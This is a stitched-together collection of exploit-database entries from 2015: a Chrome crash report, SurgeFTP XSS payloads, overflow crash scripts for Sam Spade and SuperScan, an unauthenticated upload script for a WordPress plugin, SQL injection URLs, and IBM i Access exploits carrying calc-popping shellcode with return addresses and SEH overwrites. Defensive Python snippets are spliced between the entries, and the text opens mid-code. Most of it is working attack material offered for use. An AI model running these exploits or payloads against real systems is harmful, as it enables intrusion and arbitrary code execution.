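    print(compare_checks(0x100, INT32_MAX, INT32_MAX, 0x12))
    # A well-formed window: both checks agree.
    print(compare_checks(0x100, 0x10, 0x20, 0x30))
```

The subtract-as-you-go form is the idiom to reach for whenever several attacker-controlled lengths are added before being compared against a buffer: it needs no widening type and behaves the same on 32-bit and 64-bit builds, which is exactly the property the original comparison lacks.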
VERSION
Chrome Version: 47.0.2499.0
Operating System: Linux x86
REPRODUCTION CASE
Please include a demonstration of the security bug, such as an attached
HTML or binary file that reproduces the bug when loaded in Chrome. PLEASE
make the file as small as possible and remove any content not required to
demonstrate the bug.
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: browser
Crash State:
eax 0xf9ae8a78 -106001800
ecx 0xe7502d43 -414175933
edx 0x7b83e020 2072240160
ebx 0xf76597a0 -144336992
esp 0xe75025d0 0xe75025d0
ebp 0xe7502798 0xe7502798
esi 0x5 5
edi 0xf9061200 -117042688
eip 0xf1ddebee 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>
eflags 0x210a93 [ CF AF SF IF OF RF ID ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
=> 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>: movzbl (%edx),%ecx
0xf1ddebf1 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+97>: mov (%edi),%esi
0xf1ddebf3 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+99>: cmpb $0x0,0x100(%esi,%ecx,1)
0xf1ddebfb <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+107>: je 0xf1ddec06 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+118>
0xf1ddebfd <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+109>: movsbl %cl,%edx
#0 open_vcdiff::VCDiffCodeTableReader::GetNextInstruction (this=0xf9061200, size=0x5, mode=0xf9ae8a78 " \340\203{Ox\a\376\001") at ../../sdch/open-vcdiff/src/decodetable.cc:78
#1 0xf1ddcab5 in open_vcdiff::VCDiffDeltaFileWindow::DecodeBody (this=0xf90611c4, parseable_chunk=<optimized out>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1231
#2 0xf1ddbc8b in open_vcdiff::VCDiffDeltaFileWindow::DecodeWindow (this=0xf90611c4, parseable_chunk=0xe75031a8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1359
#3 0xf1ddb6f0 in open_vcdiff::VCDiffStreamingDecoderImpl::DecodeChunk (this=0xf90611b0, data=<optimized out>, len=<optimized out>, output_string=0x8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:887
#4 0xf1ddd499 in open_vcdiff::VCDiffStreamingDecoder::DecodeChunkToInterface (this=0x8b, data=0xe7503300 "8\026B\367\030'\317", <incomplete sequence \371\226>, len=3880792832, output_string=0xf76597a0 <_GLOBAL_OFFSET_TABLE_>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1393
#5 0xf1d2b17f in DecodeChunk<std::basic_string<char> > (this=0x7b83e020, data=<optimized out>, len=3880791363, output=<optimized out>) at ../../sdch/open-vcdiff/src/google/vcdecoder.h:83
#6 net::SdchFilter::ReadFilteredData (this=0xf9cf26e0, dest_buffer=0xd2ce0000 "", dest_len=<optimized out>) at ../../net/filter/sdch_filter.cc:424
#7 0xf1d28990 in net::Filter::ReadData (this=0xf9cf26e0, dest_buffer=0x7b83e020 <error: Cannot access memory at address 0x7b83e020>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:131
#8 0xf1d2895c in net::Filter::ReadData (this=0xfd6b7c00, dest_buffer=<optimized out>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:145
#9 0xf1ca8dde in net::URLRequestJob::ReadFilteredData (this=0xf9891a00, bytes_read=<optimized out>) at ../../net/url_request/url_request_job.cc:673
#10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=<optimized out>, buf_size=<optimized out>, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38763.zip
********************************************************************************************
# Exploit Netwin SurgeFTP Sever Stored Cross Site Scripting Vulnerabilities
# Date: 11/18/2015
# Exploit Author: Un_N0n
# Vendor: NetWin
# Software Link: http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgeftp
# Version: 23d6
# Tested on: Windows 7 x64(64bit)
********************************************************************************************
[Info]
The SurgeFTP web interface suffers from multiple stored XSS vulnerabilities.
They are:
Stored XSS in 'Domain Name' field.
[How to?]
1. Open the SurgeFTP web interface and click on the global option in the menu.
2. Add a new domain and enter this payload in the 'Domain Name' field: <img src=x onmouseover=alert(1)>
3. Save, then navigate to the main page and hover the mouse over the 'broken image' in the 'domains' section.
Stored XSS in 'Mirrors'.
[How to?]
1. Open the SurgeFTP web interface and click on the 'Mirrors' option in the menu.
2. Click on Add Mirror and enter this payload in the 'Local path' and 'Remote Host' fields: <img src=x onmouseover=alert(1)>
3. Save, then navigate to the 'Mirror' page again and hover the mouse over the 'broken image' in the 'local path' and 'remote host' fields.
Previously, somebody else reported stored XSS vulnerabilities in SurgeFTP.
The vendor tried to fix the previously reported XSS vulnerabilities by blacklisting only the <script>alert('blah')</script> payload,
which is, well, not a good practice, since I have triggered the same vulnerability by just entering a different XSS payload;
therefore white-listing is the correct solution.
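As an added example (not SurgeFTP's code and not part of the advisory above), the following Python contrasts a single-payload blacklist of the kind described above with a whitelist validator for hostname-shaped fields such as 'Domain Name' and 'Remote Host', and adds HTML output encoding for fields such as 'Local path' that cannot be reduced to a whitelist. `BLOCKED_PAYLOADS`, the function names and the hostname grammar used (RFC 1123 labels) are assumptions, not the vendor's implementation.

```python
import html
import re

# Added example, not SurgeFTP code. A one-payload blacklist beside a
# whitelist validator for hostname fields and output encoding for the rest.

# The shape of a "block this one string" fix (assumed, for comparison only).
BLOCKED_PAYLOADS = ("<script>alert('blah')</script>",)


def blacklist_accepts(value):
    """Blacklist check: reject only the listed payloads, accept everything else.
    Any payload not in the list (a different tag, a different handler) passes."""
    return not any(payload in value for payload in BLOCKED_PAYLOADS)


# RFC 1123 hostname label: 1-63 chars of [A-Za-z0-9-], no leading/trailing '-'.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def is_valid_hostname(value):
    """Whitelist check for 'Domain Name' / 'Remote Host': the value must be a
    syntactically valid hostname. '<', '>', quotes, spaces and '=' can never
    appear, so markup is rejected by construction rather than by pattern."""
    if not value or len(value) > 253:
        return False
    labels = value[:-1].split(".") if value.endswith(".") else value.split(".")
    return all(_LABEL.match(label) for label in labels)


def render_cell(value):
    """Output encoding for fields that cannot be whitelisted (a local path
    may legitimately contain almost anything): escape at the point where
    the stored value is placed into an HTML page."""
    return html.escape(value, quote=True)
```

The two checks answer different questions: the blacklist asks "is this one of the strings I have seen before?", the whitelist asks "is this a hostname?". Only the second stays correct when the next payload arrives, and output encoding is what protects the fields whose legitimate content cannot be described by a grammar.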
#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 Decode URL Buffer Overflow Crash PoC
# Discovery by : Vivek Mahajan - c3p70r
# Discovery Date : 19/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version : 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Memory Overwrite
# Tested On : Windows XP SP2 ,Windows 7 SP1 x64, Windows 8.1 x64 PRO, Windows 10 x64
# Crash Point : Go to Tools > Decode URL> Enter the contents of 'spade.txt' > OK , Note: Do Remove the http://
buffer = "A"*510
file = open("spade.txt", "w")
file.write(buffer)
file.close()
# Follow on twitter @vik.create
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : SuperScan 4.1 Windows Enumeration Hostname/IP/URL Field SEH Overflow Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 18/11/2015
# Vendor Homepage : http://www.foundstone.com
# Software Link : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version : 4.1
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1_windows_enumeration.py
# 2.- Open super_scan_4.1_windows_enumeration.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Windows Enumeration > Hostname/IP/URL
# 5.- Clic on button -> Enumerate
# 6.- Crashed
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this:
# 00E3FF98 43434343
# 42424242 *** CORRUPT ENTRY ***
# And the Stack
#00E3FF88 41414141 AAAA
#00E3FF8C 41414141 AAAA
#00E3FF90 41414141 AAAA
#00E3FF94 41414141 AAAA
#00E3FF98 42424242 BBBB Pointer to next SEH record
#00E3FF9C 43434343 CCCC SE handler
# And the Registers
#EAX 00000001
#ECX 00000001
#EDX 7C91E514 ntdll.KiFastSystemCallRet
#EBX 00A028E8
#ESP 00E3FF58 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"
#EBP 41414141
#ESI 00473774 SuperSca.00473774
#EDI 00000000
#EIP 41414141
buffer = "\x41" * 328
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("super_scan_4.1_windows_enumeration.txt", "w")
f.write(buffer + nseh + seh)
f.close()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 18/11/2015
# Vendor Homepage : http://www.foundstone.com
# Software Link : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version : 4.1
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1_tools.py
# 2.- Open super_scan_4.1_tools.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Tools > Hostname/IP/URL
# 5.- Clic on button -> Whois
# 6.- Crashed
buffer = "\x41" * 280
eip = "\x42" * 4
f = open ("super_scan_4.1_tools.txt", "w")
f.write(buffer + eip)
f.close()
* Exploit Title: WordPress Users Ultra Plugin [Unrestricted File Upload]
* Discovery Date: 2015/10/27
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps
Description
================================================================================
The WordPress plugin `Users Ultra Plugin` suffers from an unrestricted file upload vulnerability.
Any user (registered or not) can exploit a misbehavior of the plugin in order to upload csv files to the affected website. Although the plugin checks the file extension against an extension white-list (in this case only csv files are white-listed), no other checks (mime type, size, etc.) take place. This alone can expose the affected website to a variety of attacks; please see [OWASP Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload) to get an idea.
Details
================================================================================
The plugin workflow that could allow a malicious user to exploit this misbehavior is as follows:
1. Upon initialization of the plugin (anytime if it is activated) an instance of `XooUserUser` class is created
2. In the constructor of the `XooUserUser` class, a check for the POST variable `uultra-form-cvs-form-conf` takes place
(file `wp-content/plugins/users-ultra/xooclasses/xoo.userultra.user.php`, lines 19-23):
```php
if (isset($_POST['uultra-form-cvs-form-conf']))
{
/* Let's Update the Profile */
$this->process_cvs($_FILES);
}
```
3. Assuming the POST variable `uultra-form-cvs-form-conf` has been set in the request, the method `XooUserUser::process_cvs()` is called.
4. The `XooUserUser::process_cvs()` method processes every file in the `$_FILES` superglobal, checking only that the file has a `csv` extension.
In addition, we note the following points:
1. A malicious user can create and activate user accounts by exploiting this vulnerability if `$_POST["uultra-activate-account"]` is set to `active`
2. A welcome email is sent if `$_POST["uultra-send-welcome-email"]` is set to 1
3. The csv files uploaded to the server are stored in a directory (`wp-content/usersultramedia/import` by default) accessible by anyone
4. Any additional columns present in the csv file are stored in `usermeta`
5. The lack of sanitization of values in the csv file can easily lead to a persistent XSS attack, so an attacker can compromise the whole site
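To show what a complete server-side gate for such an import looks like, here is an added Python example; it is not the plugin's code, and the function names, field names and size limit are assumptions. It keeps the extension white-list the plugin already has and adds the checks the list above says are missing: an authorization and nonce check before any parsing, a size cap, a content check, a column white-list instead of storing unknown columns as user meta, and escaping of values at display time.

```python
import csv
import html
import io

# Added example, not Users Ultra code. A server-side gate for a CSV user
# import that checks what an extension-only test leaves out: who is calling,
# how big the file is, whether it really parses as CSV, and which columns
# are allowed through. Names and the size limit are assumed.

ALLOWED_EXTENSIONS = {"csv"}
ALLOWED_COLUMNS = {"user name", "email", "display name", "registration date",
                   "first name", "last name"}
MAX_BYTES = 1024 * 1024           # assumed limit for an import file


def check_import(filename, data, caller_can_import, nonce_valid):
    """Return (accepted, reason, rows). rows holds parsed dicts restricted to
    ALLOWED_COLUMNS; nothing is written anywhere by this function."""
    # 1. Authorization first: an anonymous POST must never reach the parser.
    if not caller_can_import:
        return False, "caller lacks import capability", []
    if not nonce_valid:
        return False, "missing or invalid nonce", []
    # 2. Extension white-list (the check the plugin already performs) ...
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed", []
    # 3. ... plus a size cap ...
    if len(data) > MAX_BYTES:
        return False, "file too large", []
    # 4. ... and a content check: UTF-8 text with no stray control bytes.
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False, "not UTF-8 text", []
    if any(ord(c) < 32 and c not in "\r\n\t" for c in text):
        return False, "control characters in content", []
    # 5. Parse and restrict columns: unknown columns are rejected instead of
    #    being stored as arbitrary user meta.
    reader = csv.DictReader(io.StringIO(text))
    unknown = set(reader.fieldnames or []) - ALLOWED_COLUMNS
    if unknown:
        return False, "unknown columns: " + ", ".join(sorted(unknown)), []
    rows = []
    for row in reader:
        if any(v is None for v in row.values()) or None in row:
            return False, "row with wrong field count", []
        rows.append(dict(row))
    return True, "ok", rows


def display_row(row):
    """Escape every value when it is rendered in an admin page, so a cell
    such as a display name cannot inject markup (store raw, escape on output)."""
    return {key: html.escape(value, quote=True) for key, value in row.items()}
```

The order of the checks matters: the cheap authorization and nonce checks run before any byte of the upload is inspected, so an unauthenticated request costs the server nothing and never touches the filesystem. Storing imported values raw and escaping them in `display_row` keeps the data intact while removing the persistent XSS path in point 5.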
PoC
================================================================================
The following Python3 script forms a csv file and uploads it to a site.
```python
#!/usr/bin/python3
import requests
import csv
import tempfile
url = 'http://example.com/'
postData = {
'uultra-form-cvs-form-conf': 1,
'uultra-send-welcome-email': 1,
'uultra-activate-account': 'pending'
}
csvFileHeader = ['user name', 'email', 'display name', 'registration date', 'first name', 'last name', 'age', 'country']
csvFileRow = ['userName', 'email@example.com', 'User Name', '1/1/1', 'User', 'Name', '100', 'IO']
csvFile = tempfile.NamedTemporaryFile(mode='a+t', suffix='.csv')
wr = csv.writer(csvFile, quoting=csv.QUOTE_ALL, delimiter=',')
wr.writerow(csvFileHeader)
wr.writerow(csvFileRow)
csvFile.seek(0)
files = {'file.csv': csvFile}
r = requests.post(url, data=postData, files=files)
exit(0)
```
Timeline
================================================================================
2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
2015/11/15 - Vendor responded
2015/11/15 - Patch released
Solution
================================================================================
Update to version 1.5.59
source: https://www.securityfocus.com/bid/62186/info
Flo CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/blog/index.asp?archivem='
source: https://www.securityfocus.com/bid/62146/info
dBlog CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/dblog/storico.asp?m=[Sql Injection]
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/IBMI-CLIENT-ACCESS-BUFFER-OVERFLOW.txt
Vendor:
==============
www.ibm.com
Product:
====================================================
IBM i Access for Windows
Release 7.1 of IBM i Access for Windows is affected
Vulnerability Type:
=======================
Stack Buffer Overflow
Arbitrary Code Exec
CVE Reference:
==============
CVE-2015-2023
Vulnerability Details:
=====================
IBM i Access for Windows is vulnerable to a buffer overflow. A local
attacker could overflow a buffer and execute arbitrary code on the Windows PC.
Client Access has the ability to receive remote commands via the "Cwbrxd.exe"
service.
Ref: http://www-01.ibm.com/support/docview.wss?uid=nas8N1019253
"Incoming remote command was designed for running non-interactive commands
and programs on a PC", therefore a remote attacker could execute arbitrary code on the system.
Remediation/Fixes
The issue can be fixed by obtaining and applying the Service Pack SI57907.
The buffer overflow vulnerability can be remediated by applying Service
Pack SI57907.
The Service Pack is available at:
http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html
Workarounds and Mitigations
None known
CVSS Base Score: 4.4
CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/104044 for the
current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:L/AC:M/Au:N/C:P/I:P/A:P)
Exploit code(s):
==============================================================================
Three python POC scriptz follow that exploitz various components of IBM i
Access.
1) Exploits "ftdwprt.exe", direct EIP overwrite
import struct,os,subprocess
pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwprt.exe "
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
# use jmp or call esp in FTDBT.dll under AFPviewer for Client Access
# we find ---> 0x638091df : jmp esp | {PAGE_EXECUTE_READ} [FTDBDT.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.05.04.00
# (C:\Program Files (x86)\IBM\Client Access\AFPViewr\FTDBDT.dll)
rp=struct.pack('<L', 0x638091FB)
payload="A" * 1043+rp+sc+"\x90"*20
subprocess.Popen([pgm, payload], shell=False) #<----1043 bytes outside of debugger, use 1044 in debugger.
==================================
2) Exploits "ftdwinvw.exe", direct EIP overwrite
import struct,os,subprocess
pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwinvw.exe "
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
#payload="A"*1044+"RRRR"+"\x90"*10+"B"*100 #Test EIP
rp=struct.pack('<L', 0x638091fb) #CALL ESP (0x638091fb) FTDBDT.dll
payload="A"*1044+rp+"\x90"*10+sc #KABOOM!!!
subprocess.Popen([pgm, payload], shell=False)
registers dump...
EAX 0000040B
ECX 0044AAB8 ASCII "AAAAAAAAA...
EDX 7F17E09F
EBX 00000000
ESP 0018E5B8
EBP 41414141
ESI 005A9FB9 ASCII "AAAAAAAAA...
EDI 0044E94C ftdwinvw.0044E94C
EIP 52525252 <----------BOOM!
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
3) Exploits "PCSWS.exe", structured exception handler (SEH) overwrite
import struct,os,subprocess
pgm="C:\\Program Files (x86)\\IBM\\Client Access\\Emulator\\pcsws.exe "
#ctrl EIP at 1340 bytes, ESP points to RETURN to ntdll.770BB499 so we will
#jump 8 bytes to our SC
#as ESP points to our SC 8 bytes after!
jmp="\xEB\x06"+"\x90"*2
#payload="A"*1336+"BBBB" #Test
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
rp=struct.pack('<L', 0x678c1e49) #pop pop ret 0x67952486 PCSW32X.dll
payload="A"*1332+jmp+rp+sc+"\x90"*10 #KABOOOOOOOOOOOOOOOOOOM!
subprocess.Popen([pgm, payload], shell=False)
register dump...
0018FF6C 41414141 AAAA
0018FF70 41414141 AAAA
0018FF74 41414141 AAAA
0018FF78 41414141 AAAA Pointer to next SEH record
0018FF7C 42424242 BBBB SE handler
0018FF80 004C0400 .L. pcsws.004C0400
Disclosure Timeline:
====================================
Vendor Notification: May 21, 2015
November 18, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local / Remote
Severity Level:
================
High
Description:
=================================================================================
Request Method(s): [+] local or remote commands via "Cwbrxd.exe"
service
Vulnerable Product: [+] IBM i Access for Windows Release 7.1
Affected Area(s): [+] OS
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx